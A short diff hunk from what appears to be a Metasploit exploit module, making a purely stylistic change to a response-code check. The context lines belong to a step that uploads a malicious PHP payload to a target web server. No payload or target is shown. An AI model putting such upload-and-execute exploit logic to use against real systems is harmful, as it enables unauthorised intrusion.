@@ -303,7 +303,7 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::Unknown, 'Connection failed while trying to upload the payload.')
     end
 
-    unless (res.code == 200 || res.code == 302)
+    unless res.code == 200 || res.code == 302
       fail_with(Failure::Unknown, 'Failed to upload the payload.')
     end
     print_status("Uploaded malicious PHP file #{@pl_file}.")
